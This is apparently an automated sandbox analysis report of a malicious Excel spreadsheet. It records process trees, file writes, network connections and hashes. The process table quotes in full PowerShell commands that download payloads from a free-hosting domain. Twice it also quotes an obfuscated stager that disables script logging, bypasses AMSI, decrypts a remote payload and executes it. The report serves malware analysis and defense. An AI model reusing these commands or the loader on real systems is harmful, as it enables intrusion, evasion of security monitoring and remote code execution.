File name: | CotizacionGASLP_2.xls |
Full analysis: | https://app.any.run/tasks/f6e6dabc-101c-4ea1-9b91-585d9391f612 |
Verdict: | Malicious activity |
Analysis date: | April 24, 2019, 04:40:15 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Gear Capitan, Last Saved By: Pentesting, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Mar 8 07:16:16 2019, Last Saved Time/Date: Fri Mar 8 08:30:22 2019, Security: 0 |
MD5: | 11D675434F9AF160C74D43D9D2020EB9 |
SHA1: | F9D702DCE12B7FC6245F538C9CF7AFD0122C38E7 |
SHA256: | 0B842EBEB65D74BDFD4E0D04DD9DABB2D3DAC70E7F5471FB8FBABC60368B2868 |
SSDEEP: | 6144:DP+SKa85Y11//fs5cClfZw2gmVXqAMQO1WPz8aCLnhlO/QxexGFsiVjpLS:z12oRhYIV1S |
.xls | Microsoft Excel sheet (48) |
.xls | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Hoja de cálculo de Microsoft Excel 2003 |
CompObjUserTypeLen: | 40 |
HeadingPairs: | |
TitleOfParts: | START |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:03:08 08:30:22 |
CreateDate: | 2019:03:08 07:16:16 |
Software: | Microsoft Excel |
LastModifiedBy: | Pentesting |
Author: | Gear Capitan |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2304 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3612 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\Af.vbs" | C:\Windows\System32\WScript.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
344 | cmd /c ""C:\Users\Public\Af2.bat" " | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1928 | powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://zeroratchet.000webhostapp.com/vbs.vbs','C:\Users\Public\vbs.vbs'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2140 | "C:\Windows\System32\WScript.exe" "C:\Users\Public\vbs.vbs" | C:\Windows\System32\WScript.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2292 | "C:\WIndOWs\sySTeM32\CmD.EXe" /CPoWeRSHELL -wINDoWstY HiDD -NoprOf -ExECutiONpolicy byPasS -Noexit -NoNinTeRact " ${F`La5} = [TypE](\"{13}{5}{8}{10}{7}{14}{1}{9}{0}{2}{12}{11}{3}{4}{6}\"-f'RING','TionA',',S','T','EM.oBje','l','cT','E','lECTIOn','rY[St','S.gEn','S','Y','cO','riC.DIC') ; Set (\"{0}{1}\"-f 'iR','f') ([TYPe](\"{0}{1}{3}{2}\"-F'Scr','iPTbL','k','Oc') ) ; sV (\"{1}{0}\" -f'Yi6j','tC') ( [TYpe](\"{0}{1}\"-F 'r','Ef')) ; sEt-iTEM ('v'+'aR'+'ia'+'BLE:1S4d'+'c') ([tYPE](\"{5}{3}{0}{4}{2}{1}\"-F'e','tMANaGer','iCEpOiN','yST','m.NET.SeRV','S') ); sET-iteM (\"{2}{4}{3}{0}{1}\"-f'l','E:6sJGf','vA','Ab','ri') ( [tYpE](\"{0}{4}{3}{1}{2}\"-F 'SYSteM','rEq','UEst','net.web','.')); sET (\"Bz\"+\"3mN\") ( [TypE](\"{1}{3}{2}{4}{0}\"-f'tIalCaChe','SYsTEM.NeT','DE','.CrE','n') ) ; sEt-itEM (\"{3}{1}{4}{2}{0}\"-f'kM','a','lE:V0','V','RIaB') ( [tYPE](\"{5}{1}{3}{2}{4}{0}\"-F 'ding','y','.T','STeM','exT.ENCO','S') ) ; ${b`d`4Q6} = [typE](\"{0}{1}{2}\"-F 'TExt.enc','ODin','g') ; ${P9T`YA}= [TYpE](\"{1}{0}\"-F 'nveRT','cO'); IF(${p`SvErsI`o`NtaBlE}.\"PsVE`RsIOn\".\"Ma`Jor\" -ge 3){${9`F3}= ${TC`yi6j}.\"AsSemb`lY\".(\"{0}{1}\" -f 'GeTTy','pE').Invoke((\"{3}{0}{4}{5}{2}{1}\" -f 'ystem.','ation.Utils','tom','S','Manageme','nt.Au')).\"GeTFIE`lD\"((\"{0}{2}{1}{4}{3}{6}{5}\" -f'cach','dG','e','oupPoli','r','ttings','cySe'),'N'+(\"{0}{1}{2}\"-f'o','nPublic,','Static'));If(${9`F3}){${0`5f}=${9`F3}.(\"{1}{0}\" -f'ue','GEtVaL').Invoke(${n`ULl});If(${0`5F}[(\"{0}{1}\"-f 'Scri','ptB')+(\"{1}{2}{0}{3}\"-f 'ggin','loc','kLo','g')]){${0`5F}[(\"{0}{2}{1}\" -f'S','iptB','cr')+(\"{2}{1}{0}{3}\" -f'gi','og','lockL','ng')][(\"{2}{0}{1}{3}\"-f 'nable','Scrip','E','tB')+(\"{2}{3}{1}{0}\"-f'ing','Logg','loc','k')]=0;${0`5F}[(\"{2}{1}{0}\" -f 'riptB','c','S')+(\"{0}{2}{1}\"-f'lockLoggi','g','n')][(\"{7}{1}{0}{10}{2}{3}{4}{5}{8}{6}{9}\"-f 'l','b','cri','ptBl','ockInv','oc','tionL','Ena','a','ogging','eS')]=0}${v`Al}= ( GET-chIldItEM 
(\"VArIable:\"+\"fl\"+\"A5\")).\"V`Alue\"::(\"{1}{0}\"-f'Ew','N').Invoke();${V`Al}.(\"{1}{0}\"-f 'd','Ad').Invoke((\"{3}{1}{0}{2}\"-f 'leScrip','nab','tB','E')+(\"{0}{1}{2}\"-f 'lockL','og','ging'),0);${v`AL}.(\"{1}{0}\" -f 'd','Ad').Invoke((\"{3}{0}{1}{4}{5}{6}{2}\"-f 'nableScriptBloc','kI','g','E','nvocat','ionLoggi','n'),0);${0`5F}[(((\"{11}{12}{23}{14}{16}{1}{2}{21}{17}{19}{15}{7}{8}{9}{4}{5}{6}{10}{3}{22}{20}{0}{13}{18}\"-f'cri','m','1','ShellI','Im1','Po','w','o','softIm1','Windows','er','H','KEY','pt','1Sof','Micr','twareI','icies','B','Im1','S','Pol','m1','_LOCAL_MACHINEIm')) -replace ([Char]73+[Char]109+[Char]49),[Char]92)+(\"{0}{2}{1}\"-f 'lockLo','ing','gg')]=${v`AL}}ELSE{ ( GET-varIaBLE (\"{1}{0}\" -f 'F','Ir') -vALUEOnLy ).\"GEtFie`lD\"((\"{1}{2}{0}\" -f'gnatures','s','i'),'N'+(\"{2}{3}{0}{1}{4}\" -f'St','a','on','Public,','tic')).(\"{1}{0}\"-f 'Ue','SEtVaL').Invoke(${nU`LL},(.(\"{2}{1}{0}\" -f 'T','W-OBjeC','Ne') (\"{1}{2}{3}{5}{4}{6}{0}\"-f']','C','ollEC','tI','sTR','OnS.GeneRiC.HAShSeT[','INg')))}${r`EF}= ${T`c`YI6j}.\"A`sSeM`Bly\".(\"{0}{1}\" -f'Ge','TTyPE').Invoke((\"{6}{9}{1}{2}{5}{8}{10}{0}{7}{4}{3}\"-f'o','.M','anagem','iUtils','s','e','Sy','n.Am','nt.Autom','stem','ati'));${r`EF}.(\"{0}{1}\" -f'G','etFIeLD').Invoke((\"{3}{2}{1}{4}{0}\" -f 'ed','siI','m','a','nitFail'),(\"{4}{2}{1}{0}{3}\" -f'Sta','blic,','nPu','tic','No')).(\"{1}{0}{2}\"-f 'VALu','SeT','e').Invoke(${nU`LL},${t`RUe});}; ( Get-vARiaBlE ('1'+'s4dc') ).\"VA`Lue\"::\"EXP`EcT`100`CoNTI`Nue\"=0;${1`77}=.(\"{0}{1}{3}{2}\"-f'N','Ew-O','T','bJEC') (\"{2}{3}{4}{1}{0}\" -f'IEnt','NeT.WEbCl','SY','s','teM.');${U}=(\"{14}{2}{4}{6}{8}{10}{5}{12}{9}{7}{0}{13}{1}{11}{3}\" -f'/7','0; rv','l','ecko','la/5','i','.0 (Windows','t',' NT 6.1; WOW','en','64; Tr',':11.0) like G','d','.','Mozi');${1`77}.\"HEa`d`ErS\".(\"{0}{1}\" -f 'Ad','d').Invoke((\"{1}{0}{2}\"-f 'ser-Age','U','nt'),${U});${1`77}.\"hEa`D`ErS\".(\"{1}{0}\" -f'dD','A').Invoke((\"{1}{2}{0}\"-f 
'ent','User-A','g'),${U});${1`77}.\"Pr`oxy\"= (VAriAbLe (\"{0}{1}\" -f'6SJ','GF') -ValU )::\"D`EFaU`L`TWebProxy\";${1`77}.\"PR`oxY\".\"CRE`d`enT`Ials\" = ( iTem ('Va'+'r'+'iAbLe:bZ'+'3mn')).\"val`Ue\"::\"de`FaultNetW`OrkCRED`enTI`AlS\";${sC`RipT:pR`OxY} = ${1`77}.\"Pr`oxY\";${k}= ( geT-ITEm (\"{1}{3}{0}{2}\"-f'ABLE:v','Va','0Km','ri')).\"Va`Lue\"::\"AS`cii\".(\"{0}{2}{1}\"-f'G','Ytes','ETB').Invoke((\"{0}{4}{6}{1}{7}{8}{9}{2}{5}{3}\"-f '75','cf520b0','1ec9','36ff','d2','2','9c','5d','7','ec49a5c'));${r}={${D},${K}=${aR`Gs};${S}=0..255;0..255|&('%'){${j}=(${J}+${s}[${_}]+${k}[${_}%${k}.\"CO`Unt\"])%256;${s}[${_}],${S}[${J}]=${S}[${j}],${s}[${_}]};${d}|.('%'){${I}=(${I}+1)%256;${H}=(${H}+${s}[${i}])%256;${s}[${i}],${S}[${h}]=${s}[${H}],${s}[${i}];${_}-bXor${s}[(${s}[${i}]+${S}[${H}])%256]}};${s`ER}=$( ( gET-vArIaBLE (\"{1}{0}\" -f '6','Bd4Q') -VaL)::\"Un`IC`oDe\".\"g`etS`TrIng\"( ${P`9TyA}::(\"{2}{3}{0}{1}\"-f 'n','g','F','romBaSe64STRi').Invoke((\"{22}{3}{21}{27}{25}{24}{17}{12}{14}{0}{8}{2}{19}{11}{13}{18}{4}{10}{23}{16}{20}{15}{7}{26}{5}{6}{9}{1}\" -f'wByAG8','YA','wB','B0A','AG','8AcgBnADoAN','gA2A','zA','Ac','D','QAbwB','AGYA','C8ALwBtAG','dAA','kAY','AB','BvAGE','A','t','v','AZ','HQ','aA','3AG4AbA','6','AA','C4AZAB1AGMAawBkAG4AcwAuAG','Ac'))));${t}=(\"{1}{0}{2}\"-f 'adm','/','in/get.php');${1`77}.\"h`eadErs\".(\"{1}{0}\" -f 'D','AD').Invoke((\"{0}{1}\"-f'C','ookie'),(\"{3}{5}{2}{7}{1}{0}{8}{4}{6}\"-f'p','Pb','n6','hPrUMXGP','k','wGicOf=xY','ngeU=','1t','RKZcG36w6K4m0'));${D`AtA}=${1`77}.(\"{2}{3}{0}{1}\"-f'nloaDDAT','A','Do','w').Invoke(${S`er}+${T});${iV}=${d`ATA}[0..3];${DA`Ta}=${DA`TA}[4..${dA`TA}.\"Le`N`GTH\"];-JOiN[ChaR[]](& ${R} ${d`Ata} (${i`V}+${k}))|&(\"{1}{0}\" -f 'X','IE')" | C:\WIndOWs\sySTeM32\CmD.EXe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 4294770688 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1356 | PoWeRSHELL -wINDoWstY HiDD -NoprOf -ExECutiONpolicy byPasS -Noexit -NoNinTeRact " ${F`La5} = [TypE](\"{13}{5}{8}{10}{7}{14}{1}{9}{0}{2}{12}{11}{3}{4}{6}\"-f'RING','TionA',',S','T','EM.oBje','l','cT','E','lECTIOn','rY[St','S.gEn','S','Y','cO','riC.DIC') ; Set (\"{0}{1}\"-f 'iR','f') ([TYPe](\"{0}{1}{3}{2}\"-F'Scr','iPTbL','k','Oc') ) ; sV (\"{1}{0}\" -f'Yi6j','tC') ( [TYpe](\"{0}{1}\"-F 'r','Ef')) ; sEt-iTEM ('v'+'aR'+'ia'+'BLE:1S4d'+'c') ([tYPE](\"{5}{3}{0}{4}{2}{1}\"-F'e','tMANaGer','iCEpOiN','yST','m.NET.SeRV','S') ); sET-iteM (\"{2}{4}{3}{0}{1}\"-f'l','E:6sJGf','vA','Ab','ri') ( [tYpE](\"{0}{4}{3}{1}{2}\"-F 'SYSteM','rEq','UEst','net.web','.')); sET (\"Bz\"+\"3mN\") ( [TypE](\"{1}{3}{2}{4}{0}\"-f'tIalCaChe','SYsTEM.NeT','DE','.CrE','n') ) ; sEt-itEM (\"{3}{1}{4}{2}{0}\"-f'kM','a','lE:V0','V','RIaB') ( [tYPE](\"{5}{1}{3}{2}{4}{0}\"-F 'ding','y','.T','STeM','exT.ENCO','S') ) ; ${b`d`4Q6} = [typE](\"{0}{1}{2}\"-F 'TExt.enc','ODin','g') ; ${P9T`YA}= [TYpE](\"{1}{0}\"-F 'nveRT','cO'); IF(${p`SvErsI`o`NtaBlE}.\"PsVE`RsIOn\".\"Ma`Jor\" -ge 3){${9`F3}= ${TC`yi6j}.\"AsSemb`lY\".(\"{0}{1}\" -f 'GeTTy','pE').Invoke((\"{3}{0}{4}{5}{2}{1}\" -f 'ystem.','ation.Utils','tom','S','Manageme','nt.Au')).\"GeTFIE`lD\"((\"{0}{2}{1}{4}{3}{6}{5}\" -f'cach','dG','e','oupPoli','r','ttings','cySe'),'N'+(\"{0}{1}{2}\"-f'o','nPublic,','Static'));If(${9`F3}){${0`5f}=${9`F3}.(\"{1}{0}\" -f'ue','GEtVaL').Invoke(${n`ULl});If(${0`5F}[(\"{0}{1}\"-f 'Scri','ptB')+(\"{1}{2}{0}{3}\"-f 'ggin','loc','kLo','g')]){${0`5F}[(\"{0}{2}{1}\" -f'S','iptB','cr')+(\"{2}{1}{0}{3}\" -f'gi','og','lockL','ng')][(\"{2}{0}{1}{3}\"-f 'nable','Scrip','E','tB')+(\"{2}{3}{1}{0}\"-f'ing','Logg','loc','k')]=0;${0`5F}[(\"{2}{1}{0}\" -f 'riptB','c','S')+(\"{0}{2}{1}\"-f'lockLoggi','g','n')][(\"{7}{1}{0}{10}{2}{3}{4}{5}{8}{6}{9}\"-f 'l','b','cri','ptBl','ockInv','oc','tionL','Ena','a','ogging','eS')]=0}${v`Al}= ( GET-chIldItEM 
(\"VArIable:\"+\"fl\"+\"A5\")).\"V`Alue\"::(\"{1}{0}\"-f'Ew','N').Invoke();${V`Al}.(\"{1}{0}\"-f 'd','Ad').Invoke((\"{3}{1}{0}{2}\"-f 'leScrip','nab','tB','E')+(\"{0}{1}{2}\"-f 'lockL','og','ging'),0);${v`AL}.(\"{1}{0}\" -f 'd','Ad').Invoke((\"{3}{0}{1}{4}{5}{6}{2}\"-f 'nableScriptBloc','kI','g','E','nvocat','ionLoggi','n'),0);${0`5F}[(((\"{11}{12}{23}{14}{16}{1}{2}{21}{17}{19}{15}{7}{8}{9}{4}{5}{6}{10}{3}{22}{20}{0}{13}{18}\"-f'cri','m','1','ShellI','Im1','Po','w','o','softIm1','Windows','er','H','KEY','pt','1Sof','Micr','twareI','icies','B','Im1','S','Pol','m1','_LOCAL_MACHINEIm')) -replace ([Char]73+[Char]109+[Char]49),[Char]92)+(\"{0}{2}{1}\"-f 'lockLo','ing','gg')]=${v`AL}}ELSE{ ( GET-varIaBLE (\"{1}{0}\" -f 'F','Ir') -vALUEOnLy ).\"GEtFie`lD\"((\"{1}{2}{0}\" -f'gnatures','s','i'),'N'+(\"{2}{3}{0}{1}{4}\" -f'St','a','on','Public,','tic')).(\"{1}{0}\"-f 'Ue','SEtVaL').Invoke(${nU`LL},(.(\"{2}{1}{0}\" -f 'T','W-OBjeC','Ne') (\"{1}{2}{3}{5}{4}{6}{0}\"-f']','C','ollEC','tI','sTR','OnS.GeneRiC.HAShSeT[','INg')))}${r`EF}= ${T`c`YI6j}.\"A`sSeM`Bly\".(\"{0}{1}\" -f'Ge','TTyPE').Invoke((\"{6}{9}{1}{2}{5}{8}{10}{0}{7}{4}{3}\"-f'o','.M','anagem','iUtils','s','e','Sy','n.Am','nt.Autom','stem','ati'));${r`EF}.(\"{0}{1}\" -f'G','etFIeLD').Invoke((\"{3}{2}{1}{4}{0}\" -f 'ed','siI','m','a','nitFail'),(\"{4}{2}{1}{0}{3}\" -f'Sta','blic,','nPu','tic','No')).(\"{1}{0}{2}\"-f 'VALu','SeT','e').Invoke(${nU`LL},${t`RUe});}; ( Get-vARiaBlE ('1'+'s4dc') ).\"VA`Lue\"::\"EXP`EcT`100`CoNTI`Nue\"=0;${1`77}=.(\"{0}{1}{3}{2}\"-f'N','Ew-O','T','bJEC') (\"{2}{3}{4}{1}{0}\" -f'IEnt','NeT.WEbCl','SY','s','teM.');${U}=(\"{14}{2}{4}{6}{8}{10}{5}{12}{9}{7}{0}{13}{1}{11}{3}\" -f'/7','0; rv','l','ecko','la/5','i','.0 (Windows','t',' NT 6.1; WOW','en','64; Tr',':11.0) like G','d','.','Mozi');${1`77}.\"HEa`d`ErS\".(\"{0}{1}\" -f 'Ad','d').Invoke((\"{1}{0}{2}\"-f 'ser-Age','U','nt'),${U});${1`77}.\"hEa`D`ErS\".(\"{1}{0}\" -f'dD','A').Invoke((\"{1}{2}{0}\"-f 
'ent','User-A','g'),${U});${1`77}.\"Pr`oxy\"= (VAriAbLe (\"{0}{1}\" -f'6SJ','GF') -ValU )::\"D`EFaU`L`TWebProxy\";${1`77}.\"PR`oxY\".\"CRE`d`enT`Ials\" = ( iTem ('Va'+'r'+'iAbLe:bZ'+'3mn')).\"val`Ue\"::\"de`FaultNetW`OrkCRED`enTI`AlS\";${sC`RipT:pR`OxY} = ${1`77}.\"Pr`oxY\";${k}= ( geT-ITEm (\"{1}{3}{0}{2}\"-f'ABLE:v','Va','0Km','ri')).\"Va`Lue\"::\"AS`cii\".(\"{0}{2}{1}\"-f'G','Ytes','ETB').Invoke((\"{0}{4}{6}{1}{7}{8}{9}{2}{5}{3}\"-f '75','cf520b0','1ec9','36ff','d2','2','9c','5d','7','ec49a5c'));${r}={${D},${K}=${aR`Gs};${S}=0..255;0..255|&('%'){${j}=(${J}+${s}[${_}]+${k}[${_}%${k}.\"CO`Unt\"])%256;${s}[${_}],${S}[${J}]=${S}[${j}],${s}[${_}]};${d}|.('%'){${I}=(${I}+1)%256;${H}=(${H}+${s}[${i}])%256;${s}[${i}],${S}[${h}]=${s}[${H}],${s}[${i}];${_}-bXor${s}[(${s}[${i}]+${S}[${H}])%256]}};${s`ER}=$( ( gET-vArIaBLE (\"{1}{0}\" -f '6','Bd4Q') -VaL)::\"Un`IC`oDe\".\"g`etS`TrIng\"( ${P`9TyA}::(\"{2}{3}{0}{1}\"-f 'n','g','F','romBaSe64STRi').Invoke((\"{22}{3}{21}{27}{25}{24}{17}{12}{14}{0}{8}{2}{19}{11}{13}{18}{4}{10}{23}{16}{20}{15}{7}{26}{5}{6}{9}{1}\" -f'wByAG8','YA','wB','B0A','AG','8AcgBnADoAN','gA2A','zA','Ac','D','QAbwB','AGYA','C8ALwBtAG','dAA','kAY','AB','BvAGE','A','t','v','AZ','HQ','aA','3AG4AbA','6','AA','C4AZAB1AGMAawBkAG4AcwAuAG','Ac'))));${t}=(\"{1}{0}{2}\"-f 'adm','/','in/get.php');${1`77}.\"h`eadErs\".(\"{1}{0}\" -f 'D','AD').Invoke((\"{0}{1}\"-f'C','ookie'),(\"{3}{5}{2}{7}{1}{0}{8}{4}{6}\"-f'p','Pb','n6','hPrUMXGP','k','wGicOf=xY','ngeU=','1t','RKZcG36w6K4m0'));${D`AtA}=${1`77}.(\"{2}{3}{0}{1}\"-f'nloaDDAT','A','Do','w').Invoke(${S`er}+${T});${iV}=${d`ATA}[0..3];${DA`Ta}=${DA`TA}[4..${dA`TA}.\"Le`N`GTH\"];-JOiN[ChaR[]](& ${R} ${d`Ata} (${i`V}+${k}))|&(\"{1}{0}\" -f 'X','IE')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CmD.EXe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294770688 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1424 | "C:\Windows\System32\cmd.exe" /c C:\Users\Public\Af.bat | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3876 | powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://zeroratchet.000webhostapp.com/OfficeUpdate.jpg','C:\Users\Public\OfficeUpdate.exe'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3216 | timeout 5 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2304 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6DB9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LJ07I1ZEKUCZH610GJX4.temp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab82F7.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar82F8.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab8308.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar8309.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Cab8404.tmp | — | |
MD5:— | SHA256:— | |||
1928 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Tar8405.tmp | — | |
MD5:— | SHA256:— | |||
1356 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YG6XLSES8AESX4LOWABG.temp | — | |
MD5:— | SHA256:— | |||
3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7QOV3DOAK1R47G58QRPV.temp | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1928 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab | US | compressed | 55.6 Kb | whitelisted |
1928 | powershell.exe | GET | 200 | 93.184.221.240:80 | http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D1CC8D4F82A4.crt | US | der | 914 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3876 | powershell.exe | 145.14.144.7:443 | zeroratchet.000webhostapp.com | Hostinger International Limited | US | shared |
1928 | powershell.exe | 145.14.144.7:443 | zeroratchet.000webhostapp.com | Hostinger International Limited | US | shared |
1928 | powershell.exe | 93.184.221.240:80 | www.download.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
zeroratchet.000webhostapp.com | | shared |
www.download.windowsupdate.com | | whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
1928 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |
3876 | powershell.exe | Not Suspicious Traffic | ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com) |